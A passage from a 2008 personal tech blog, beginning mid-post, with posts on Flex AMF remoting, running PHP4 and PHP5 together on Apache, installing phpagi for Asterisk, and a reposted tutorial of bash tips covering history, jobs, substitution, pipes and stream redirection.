var amf: CAmf = new CAmf( "http://192.168.1.1/gateway.php" );

var group: CGroup = new CGroup();
    group.name = "P´s";

var userA: CUser = new CUser();
    userA.username = "Peter";
    group.members.addItem( userA );

var userB: CUser = new CUser();
    userB.username = "Patrick";
    group.members.addItem( userB );

amf.call( "CAMF", "SendMembers", group );

After adding the users, the group it is send by using CAMF->SendMembers( group ). If all went well again, it should return telling you how many members are found. The group is already deserialized before reaching the function, hence a hard type like (CGroup $group) is possible!

Download source files

references
Using Flex 2 RemoteObject and SabreAMF by Renaun Erickson
Getting started with SabreAMF by Wil Li
SabreAMF
AMFPHP
BlazeDS
PyAMF

July 9th, 2008 - Posted in flex, php | | 0 Comments

Multiple/unlimited php versions on an single Debian apache server

For an project I needed an PHP4 installation, unfortunately (depending on your view) my server was running PHP5. So I needed a dual php setup ’cause I didn’t wanted to upsad other users on the same machine. Searching the web I came across a few different approaches some worked others didn´t. Here´s a list of what I found:

  • http://www.howtoforge.com/apache2_with_php5_and_php4
  • http://gggeek.altervista.org/2007/07/21/running-multiple-php-versions-on-a-single-apache-install/
  • http://www.hilluzination.de/php-fastcgi/php-fastcgi.html

It basically boils down to having one loaded as an module (default version) and the other(s) as CGI. Execute apt-get install php4-cgi and a2enmod actions

With some reservation I mentioned others in plural, because, as far as I´ve seen, there really is no limit in different versions installed through CGI. Just rename all php-cgix executables in an orderly fashion and you should be fine. Let me know if you had the courage to try!

I choose the most elegant one (and made a few adjustments ;)

  • http://www.jsanroman.net/2008/05/06/php5-y-php4-tambien-conviven-en-mi-ubuntu/

This cabròn configured a virtual host like this:

<VirtualHost *:80>
	ServerAdmin pepe@midominio.com
	ServerName midominio.com
	DocumentRoot /home/pepe/php4/miproyecto
	ErrorLog /var/log/apache2/error.log
	LogLevel warn
	CustomLog /var/log/apache2/access.log combined

	ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

	<Directory />
		AddHandler php-script .php
		Action php-script /cgi-bin/php4
		Options FollowSymLinks
		AllowOverride None
	</Directory>
</VirtualHost>

This excerpt finally made it into mine:

<VirtualHost *:80>
	ServerAdmin pepe@midominio.com
	ServerName midominio.com
	DocumentRoot /home/pepe/www

	ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
	AddHandler php-script .php4
	Action php-script /cgi-bin/php4
</VirtualHost>

Test the dual php configuration by creating two identical phpinfo() files but with different extentions like phpinfo.php4 and phpinfo.php The latter should still be parsed as php 5.

July 3rd, 2008 - Posted in php | | 0 Comments

Installing phpagi 2.x

I’am using Debian/4, Apache/2.2.3, PHP 5.2.5-0.dotdeb.2 and Asterisk/1.4.13

Download agi-php 2.x files from http://phpagi.sourceforge.net/

Adjust agi script files location set in asterisk.conf (a simple reload won’t do the job, so restart Asterisk afterwards)

[directories]
astagidir => /var/lib/asterisk/agi-bin

Create a context in the dialplan for your agi scripts in extention.conf
[agi]
exten => 800,1,Verbose(1|AGI)
exten => 800,n,agi(dtmf.php)
exten => 800,n,Hangup()

and include it in your incoming context with
include => agi

Before you can use the examples eg. dtmf.php a few adjustments are needed:

1. Scripts must be executable: chmod 755 dtmf.php

2. All php files are run by Asterisk, as if started from the console, so test that by actually running it from the console.

I had to edit dtmf.php to make a few changes:
Change the interpreter location from
#!/usr/local/bin/php -q
to
#!/usr/bin/php5 -q

Change the php include path to let the script find the file phpagi.php with
ini_set( "include_path", "/your_folder_to_phpagi.php/" );

Install speech engine
I followed the installation guide available at www.voip-info.org.

apt-get install festival
Comment out ;exit 0

Possible errors and solutions

Error message:
Failed to execute ‘/var/lib/asterisk/agi-bin/dtmf.php’: No such file or directory

Solutions:
Either check your astagidir in asterisk.conf
or make the dtmf.php executable with chmod 755
or check the line “#!/usr/bin/php5 -q”

Error message:
WARNING[26320]: file.c:563 ast_openstream_full: File /var/spool/asterisk/tmp//text2wav_ace75969fc9b3a79aef4da4291ca0646 does not exist in any format.
Solution:
Festival is not started or installed (Remember the exit 0; ?)

ADDENDUM:

http://jroliva.wordpress.com/2008/10/26/howto-consulta-de-stocks-usando-asterisk-phpagi-y-mysql/

Update 07/12/2011:

The Festival installation guide at www.voip-info.org has been moved to http://www.voip-info.org/wiki/view/Asterisk+festival+installation

June 26th, 2008 - Posted in asterisk, voIP | | 2 Comments

Installing spanish voices for festival speech synthesis system

On this blog I found the packages to install spanish voices for Festival. No apt-getting but *.deb files, learn how to install these…

June 26th, 2008 - Posted in asterisk, voIP | | 0 Comments

Tutorial: The best tips & tricks for bash…

Original text from Rechosen can be found here.

The bash shell is just amazing. There are so many tasks that can be simplified using its handy features. This tutorial tells about some of those features, explains what exactly they do and learns you how to use them.

Difficulty: Basic - Medium

Running a command from your history

Sometimes you know that you ran a command a while ago and you want to run it again. You know a bit of the command, but you don’t exactly know all options, or when you executed the command. Of course, you could just keep pressing the Up Arrow until you encounter the command again, but there is a better way. You can search the bash history in an interactive mode by pressing Ctrl + r. This will put bash in history mode, allowing you to type a part of the command you’re looking for. In the meanwhile, it will show the most recent occasion where the string you’re typing was used. If it is showing you a too recent command, you can go further back in history by pressing Ctrl + r again and again. Once you found the command you were looking for, press enter to run it. If you can’t find what you’re looking for and you want to try it again or if you want to get out of history mode for an other reason, just press Ctrl + c. By the way, Ctrl + c can be used in many other cases to cancel the current operation and/or start with a fresh new line.

Repeating an argument

You can repeat the last argument of the previous command in multiple ways. Have a look at this example:

[rechosen@localhost ~]$ mkdir /path/to/exampledir
[rechosen@localhost ~]$ cd !$

The second command might look a little strange, but it will just cd to /path/to/exampledir. The “!$” syntax repeats the last argument of the previous command. You can also insert the last argument of the previous command on the fly, which enables you to edit it before executing the command. The keyboard shortcut for this functionality is Esc + . (a period). You can also repeatedly press these keys to get the last argument of commands before the previous one.

Some keyboard shortcuts for editing

There are some pretty useful keyboard shortcuts for editing in bash. They might appear familiar to Emacs users:

  • Ctrl + a => Return to the start of the command you’re typing
  • Ctrl + e => Go to the end of the command you’re typing
  • Ctrl + u => Cut everything before the cursor to a special clipboard
  • Ctrl + k => Cut everything after the cursor to a special clipboard
  • Ctrl + y => Paste from the special clipboard that Ctrl + u and Ctrl + k save their data to
  • Ctrl + t => Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right, try it!)
  • Ctrl + w => Delete the word / argument left of the cursor
  • Ctrl + l => Clear the screen

Dealing with jobs

If you’ve just started a huge process (like backupping a lot of files) using an ssh terminal and you suddenly remember that you need to do something else on the same server, you might want to get the huge process to the background. You can do this by pressing Ctrl + z, which will suspend the process, and then executing the bg command:

[rechosen@localhost ~]$ bg
[1]+ hugeprocess &

This will make the huge process continue happily in the background, allowing you to do what you need to do. If you want to background another process with the huge one still running, just use the same steps. And if you want to get a process back to the foreground again, execute fg:

[rechosen@localhost ~]$ fg
hugeprocess

But what if you want to foreground an older process that’s still running? In a case like that, use the jobs command to see which processes bash is managing:

[rechosen@localhost ~]$ jobs
[1]- Running hugeprocess &
[2]+ Running anotherprocess &

Note: A “+” after the job id means that that job is the ‘current job’, the one that will be affected if bg or fg is executed without any arguments. A “-” after the job id means that that job is the ‘previous job’. You can refer to the previous job with “%-”.

Use the job id (the number on the left), preceded by a “%”, to specify which process to foreground / background, like this:

[rechosen@localhost ~]$ fg %3

And:

[rechosen@localhost ~]$ bg %7

The above snippets would foreground job [3] and background job [7].

Using several ways of substitution

There are multiple ways to embed a command in an other one. You could use the following way (which is called command substitution):

[rechosen@localhost ~]$ du -h -a -c $(find . -name *.conf 2>&-)

The above command is quite a mouthful of options and syntax, so I’ll explain it.

  • The du command calculates the actual size of files. The -h option makes du print the sizes in human-readable format, the -a tells du to calculate the size of all files, and the -c option tells du to produce a grand total. So, “du -h -a -c” will show the sizes of all files passed to it in a human-readable form and it will produce a grand total.
  • As you might have guessed, “$(find . -name *.conf 2>&-)” takes care of giving du some files to calculate the sizes of. This part is wrapped between “$(” and “)” to tell bash that it should run the command and return the command’s output (in this case as an argument for du). The find command searches for files named <can be anything>.conf in the current directory and all accessible subdirectories. The “.” indicates the current directory, the -name option allows to specify the filename of the file to search for, and “*.conf” is an expression that matches any string ending with the character sequence “.conf”.
  • The only thing left to explain is the “2>&-”. This part of the syntax makes bash discard the errors that find produces, so du won’t get any non-filename input. There is a huge amount of explanation about this syntax near the end of the tutorial (look for “2>&1″ and further).

And there’s another way to substitute, called process substitution:

[rechosen@localhost ~]$ diff <(ps axo comm) <(ssh user@host ps axo comm)

The command in the snippet above will compare the running processes on the local system and a remote system with an ssh server. Let’s have a closer look at it:

  • First of all, diff. The diff command can be used to compare two files. I won’t tell much about it here, as there is an extensive tutorial about diff and patch on this site.
  • Next, the “<(” and “)”. These strings indicate that bash should substitute the command between them as a process. This will create a named pipe (usually in /dev/fd) that, in our case, will be given to diff as a file to compare.
  • Now the “ps axo comm”. The ps command is used to list processes currently running on the system. The “a” option tells ps to list all processes with a tty, the “x” tells ps to list processes without a tty, too, and “o comm” tells ps to list the commands only (”o” indicates the starting of a user-defined output declaration, and “comm” indicates that ps should print the COMMAND column).
  • The “ssh user@host ps axo comm” will run “ps axo comm” on a remote system with an ssh server. For more detailed information about ssh, see this site’s tutorial about ssh and scp.

Let’s have a look at the whole snippet now:

  • After interpreting the line, bash will run “ps axo comm” and redirect the output to a named pipe,
  • then it will execute “ssh user@host ps axo comm” and redirect the output to another named pipe,
  • and then it will execute diff with the filenames of the named pipes as argument.
  • The diff command will read the output from the pipes and compare them, and return the differences to the terminal so you can quickly see what differences there are in running processes (if you’re familiar with diff’s output, that is).

This way, you have done in one line what would normally require at least two: comparing the outputs of two processes.

And there even is another way, called xargs. This command can feed arguments, usually imported through a pipe, to a command. See the next chapter for more information about pipes. We’ll now focus on xargs itself. Have a look at this example:

[rechosen@localhost ~]$ find . -name *.conf -print0 | xargs -0 grep -l -Z mem_limit | xargs -0 -i cp {} {}.bak

Note: the “-l” after grep is an L, not an i.

The command in the snippet above will make a backup of all .conf files in the current directory and accessible subdirectories that contain the string “mem_limit”.

  • The find command is used to find all files in the current directory (the “.”) and accessible subdirectories with a filename (the “-name” option) that ends with “.conf” (”*.conf” means “<anything>.conf”). It returns a list of them, with null characters as separators (”-print0″ tells find to do so).
  • The output of find is piped (the “|” operator, see the next chapter for more information) to xargs. The “-0″ option tells xargs that the names are separated by null characters, and “grep -l -Z mem_limit” is the command that the list of files will be feeded to as arguments. The grep command will search the files it gets from xargs for the string “mem_limit”, returning a list of files (the -l option tells grep not to return the contents of the files, but just the filenames), again separated by null characters (the “-Z” option causes grep to do this).
  • The output of grep is also piped, to “xargs -0 -i cp {} {}.bak”. We know what xargs does, except for the “-i” option. The “-i” option tells xargs to replace every occasion of the specified string with the argument it gets through the pipe. If no string is specified (as in our case), xargs will assume that it should replace the string “{}”. Next, the “cp {} {}.bak”. The “{}” will be replaced by xargs with the argument, so, if xargs got the file “sample.conf” through the pipe, cp will copy the file “sample.conf” to the file “sample.conf.bak”, effectively making a backup of it.

These substitutions can, once mastered, provide short and quick solutions for complicated problems.

Piping data through commands

One of the most powerful features is the ability to pipe data through commands. You could see this as letting bash take the output of a command, then feed it to an other command, take the output of that, feed it to another and so on. This is a simple example of using a pipe:

[rechosen@localhost ~]$ ps aux | grep init

If you don’t know the commands yet: “ps aux” lists all processes executed by a valid user that are currently running on your system (the “a” means that processes of other users than the current user should also be listed, the “u” means that only processes executed by a valid user should be shown, and the “x” means that background processes (without a tty) should also be listed). The “grep init” searches the output of “ps aux” for the string “init”. It does so because bash pipes the output of “ps aux” to “grep init”, and bash does that because of the “|” operator.

The “|” operator makes bash redirect all data that the command left of it returns to the stdout (more about that later) to the stdin of the command right of it. There are a lot of commands that support taking data from the stdin, and almost every program supports returning data using the stdout.

The stdin and stdout are part of the standard streams; they were introduced with UNIX and are channels over which data can be transported. There are three standard streams (the third one is stderr, which should be used to report errors over). The stdin channel can be used by other programs to feed data to a running process, and the stdout channel can be used by a program to export data. Usually, stdout output (and stderr output, too) is received by the terminal environment in which the program is running, in our case bash. By default, bash will show you the output by echoing it onto the terminal screen, but now that we pipe it to an other command, we are not shown the data.

Please note that, as in a pipe only the stdout of the command on the left is passed on to the next one, the stderr output will still go to the terminal. I will explain how to alter this further on in this tutorial.

If you want to see the data that’s passed on between programs in a pipe, you can insert the “tee” command between it. This program receives data from the stdin and then writes it to a file, while also passing it on again through the stdout. This way, if something is going wrong in a pipe sequence, you can see what data was passing through the pipes. The “tee” command is used like this:

[rechosen@localhost ~]$ ps aux | tee filename | grep init

The “grep” command will still receive the output of “ps aux”, as tee just passes the data on, but you will be able to read the output of “ps aux” in the file <filename> after the commands have been executed. Note that “tee” tries to replace the file <filename> if you specify the command like this. If you don’t want “tee” to replace the file but to append the data to it instead, use the -a option, like this:

[rechosen@localhost ~]$ ps aux | tee -a filename | grep init

As you have been able to see in the above command, you can place a lot of command with pipes after each other. This is not infinite, though. There is a maximum command-line length, which is usually determined by the kernel. However, this value usually is so big that you are very unlikely to hit the limit. If you do, you can always save the stdout output to a file somewhere inbetween and then use that file to continue operation. And that introduces the next subject: saving the stdout output to a file.

Saving the stdout output to a file

You can save the stdout output of a command to a file like this:

[rechosen@localhost ~]$ ps aux > filename

The above syntax will make bash write the stdout output of “ps aux” to the file filename. If filename already exists, bash will try to overwrite it. If you don’t want bash to do so, but to append the output of “ps aux” to filename, you could do that this way:

[rechosen@localhost ~]$ ps aux >> filename

You can use this feature of bash to split a long line of pipes into multiple lines:

[rechosen@localhost ~]$ command1 | command2 | … | commandN > tempfile1

[rechosen@localhost ~]$ cat tempfile1 | command1 | command2 | … | commandN > tempfile2

And so on. Note that the above use of cat is, in most cases, a useless one. In many cases, you can let command1 in the second snippet read the file, like this:

[rechosen@localhost ~]$ command1 tempfile1 | command2 | … | commandN > tempfile2

And in other cases, you can use a redirect to feed a file to command1:

[rechosen@localhost ~]$ command1 < tempfile1 | command2 | … | commandN > tempfile2

To be honest, I mainly included this to avoid getting the Useless Use of Cat Award =).

Anyway, you can also use bash’s ability to write streams to file for logging the output of script commands, for example. By the way, did you know that bash can also write the stderr output to a file, or both the stdout and the stderr streams?

Playing with standard streams: redirecting and combining

The bash shell allows us to redirect streams to other streams or to files. This is quite a complicated feature, so I’ll try to explain it as clearly as possible. Redirecting a stream is done like this:

[rechosen@localhost ~]$ ps aux 2>&1 | grep init

In the snippet above, “grep init” will not only search the stdout output of “ps aux”, but also the stderr output. The stderr and the stdout streams are combined. This is caused by that strange “2>&1″ after “ps aux”. Let’s have a closer look at that.

First, the “2″. As said, there are three standard streams (stin, stdout and stderr).These standard streams also have default numbers:

  • 0: stdin
  • 1: stdout
  • 2: sterr

As you can see, “2″ is the stream number of stderr. And “>”, we already know that from making bash write to a file. The actual meaning of this symbol is “redirect the stream on the left to the stream on the right”. If there is no stream on the left, bash will assume you’re trying to redirect stdout. If there’s a filename on the right, bash will redirect the stream on the left to that file, so that everything passing through the pipe is written to the file.

Note: the “>” symbol is used with and without a space behind it in this tutorial. This is only to keep it clear whether we’re redirecting to a file or to a stream: in reality, when dealing with streams, it doesn’t matter whether a space is behind it or not. When substituting processes, you shouldn’t use any spaces.

Back to our “2>&1″. As explained, “2″ is the stream number of stderr, “>” redirects the stream somewhere, but what is “&1″? You might have guessed, as the “grep init” command mentioned above searches both the stdout and stderr stream, that “&1″ is the stdout stream. The “&” in front of it tells bash that you don’t mean a file with filename “1″. The streams are sent to the same destination, and to the command receiving them it will seem like they are combined.

If you’d want to write to a file with the name “&1″, you’d have to escape the “&”, like this:

[rechosen@localhost ~]$ ps aux > \&1

Or you could put “&1″ between single quotes, like this:

[rechosen@localhost ~]$ ps aux > ‘&1′

Wrapping a filename containing problematic characters between single quotes generally is a good way to stop bash from messing with it (unless there are single quotes in the string, then you’d have have escape them by putting a \ in front of them).

Back again to the “2>&1″. Now that we know what it means, we can also apply it in other ways, like this:

[rechosen@localhost ~]$ ps aux > filename 2>&1

The stdout output of ps aux will be sent to the file filename, and the stderr output, too. Now, this might seem unlogical. If bash would interpret it from the left to the right (and it does), you might think that it should be like:

[rechosen@localhost ~]$ ps aux 2>&1 > filename

Well, it shouldn’t. If you’d execute the above syntax, the stderr output would just be echoed to the terminal. Why? Because bash does not redirect to a stream, but to the current final destination of the stream. Let me explain it:

  • First, we’re telling bash to run the command “ps” with “aux” as an argument.
  • Then, we’re telling to redirect stderr to stdout. At the moment, stdout is still going to the terminal, so the stderr output of “ps aux” is sent to the terminal.
  • After that, we’re telling bash to redirect the stdout output to the file filename. The stdout output of “ps aux” is sent to this file indeed, but the stderr output isn’t: it is not affected by stream 1.

If we put the redirections the other way around (”> filename” first), it does work. I’ll explain that, too:

  • First, we’re telling bash to run the command “ps” with “aux” as an argument (again).
  • Then, we’re redirecting the stdout to the file filename. This causes the stdout output of “ps aux” to be written to that file.
  • After that, we’re redirecting the stderr stream to the stdout stream. The stdout stream is still pointing to the file filename because of the former statement. Therefore, stderr output is also written to the file.

Get it? The redirects cause a stream to go to the same final destination as the specified one. It does not actually merge the streams, however.

Now that we know how to redirect, we can use it in many ways. For example, we could pipe the stderr output instead of the stdout output:

[rechosen@localhost ~]$ ps aux 2>&1 > /dev/null | grep init

The syntax in this snippet will send the stderr output of “ps aux” to “grep init”, while the stdout output is sent to /dev/null and therefore discarded. Note that “grep init” will probably not find anything in this case as “ps aux” is unlikely to report any errors.

When looking more closely to the snippet above, a problem arises. As bash reads the command statements from the left to the right, nothing should go through the pipe, you might say. At the moment that “2>&1″ is specified, stdout should still point to the terminal, shouldn’t it? Well, here’s a thing you should remember: bash reads command statements from the left to the right, but, before that, determines if there are multiple command statements and in which way they are separated. Therefore, bash already read and applied the “|” pipe symbol and stdout is already pointing to the pipe. Note that this also means that stream redirections must be specified before the pipe operator. If you, for example, would move “2>&1″ to the end of the command, after “grep init”, it would not affect ps aux anymore.

We can also swap the stdout and the stderr stream. This allows to let the stderr stream pass through a pipe while the stdout is printed to the terminal. This will require a 3rd stream. Let’s have a look at this example:

[rechosen@localhost ~]$ ps aux 3>&1 1>&2 2>&3 | grep init

That stuff seems to be quite complicated, right? Let’s analyze what we’re doing here:

  • “3>&1″ => We’re redirecting stream 3 to the same final destination as stream 1 (stdout). Stream 3 is a non-standard stream, but it is pretty much always available in bash. This way, we’re effectively making a backup of the destination of stdout, which is, in this case, the pipe.
  • “1>&2″ => We’re redirecting stream 1 (stdout) to the same final destination as stream 2 (stderr). This destination is the terminal.
  • “2>&3″ => We’re redirecting stream 2 (stderr) to the final destination of stream 3. In the first step of these three ones, we set stream 3 to the same final destination as stream 1 (stdout), which was the pipe at that moment, and after that, we redirected stream 1 (stdout) to the final destination of stream 2 at that moment, the terminal. If we wouldn’t have made a backup of stream 1’s final destination in the beginning, we would not be able to refer to it now.

So, by using a backup stream, we can swap the stdout and stderr stream. This backup stream does not belong to the standard streams, but it is pretty much always available in bash. If you’re using it in a script, make sure you aren’t breaking an earlier command by playing with the 3rd stream. You can also use stream 4, 5, 6 7 and so on if you need more streams. The highest stream number usually is 1023 (there are 1024 streams, but the first stream is stream 0, stdin). This may be different on other linux systems. Your mileage may vary. If you try to use a non-existing stream, you will get an error like this:

bash: 1: Bad file descriptor

If you want to return a non-standard stream to it’s default state, redirect it to “&-”, like this:

[rechosen@localhost ~]$ ps aux 3>&1 1>&2 2>&3 3>&- | grep init

Note that the stream redirections are always reset to their initial state if you’re using them in a command. You’ll only need to do this manually if you made a redirect using, for example, exec, as redirects made this way will last until changed manually.

Final words

Well, I hope you learned a lot from this tutorial. If the things you read here were new for you, don’t worry if you can’t apply them immediately. It already is useful if you just know what a statement means if you stumble upon it sometime. If you liked this, please help spreading the word about this blog by posting a link to it here and there. Thank you for reading, and good luck working with bash!

April 27th, 2008 - Posted in tutorials | | 0 Comments

« Previous PageNext Page »